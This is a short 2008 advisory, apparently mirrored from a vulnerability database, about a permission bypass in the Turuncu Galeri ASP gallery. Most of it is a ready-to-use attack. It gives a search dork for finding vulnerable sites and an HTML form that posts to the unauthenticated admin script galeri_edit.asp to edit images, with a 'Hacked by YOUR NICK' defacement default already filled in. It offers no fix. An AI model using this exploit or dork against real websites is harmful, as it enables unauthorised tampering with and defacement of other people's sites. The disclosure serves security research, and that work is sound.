Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability

2008-06-29T00:00:00
ID SECURITYVULNS:DOC:20093
Type securityvulns
Reporter Securityvulns
Modified 2008-06-29T00:00:00

Description

Title:Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability

Discovered by : Alemin_Krali

Dork :resim_detay.asp?id=

Html Form

<form action="http://www.SITE.COM/PATH/yonet/galeri_edit.asp" method="post">

<input type="hidden" name="update" value="1"> <input type="hidden" name="id" value="EDIT TO IMAGE ID">

<td width="400"><input type="text" name="baslik" style="font-size: 8pt" color="#003366" value="Hacked by YOUR NICK" size="42" maxlength="75" /></td>

<tr><td colspan=2><center><INPUT TYPE="submit" VALUE=" Okey " </td></tr> <tr> <td colspan=2>&nbsp;</td>

Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed